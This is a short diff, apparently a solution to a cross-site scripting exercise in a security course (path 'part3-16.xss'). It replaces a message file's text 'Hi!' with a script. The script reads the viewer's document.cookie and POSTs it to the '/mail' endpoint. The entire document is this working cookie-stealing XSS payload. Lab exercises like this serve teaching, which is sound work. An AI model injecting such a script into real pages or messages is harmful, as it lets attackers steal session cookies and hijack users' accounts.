--- a/part3-16.xss/src/msg.html
+++ b/part3-16.xss/src/msg.html
@@ -1,1 +1,10 @@
-Hi!
+<script>
+    var data = new Object();
+    data.content = document.cookie;
+
+    var http = new XMLHttpRequest();
+    http.open("POST", '/mail');
+    http.setRequestHeader("Content-Type", "application/json");
+
+    http.send(JSON.stringify(data));
+</script>
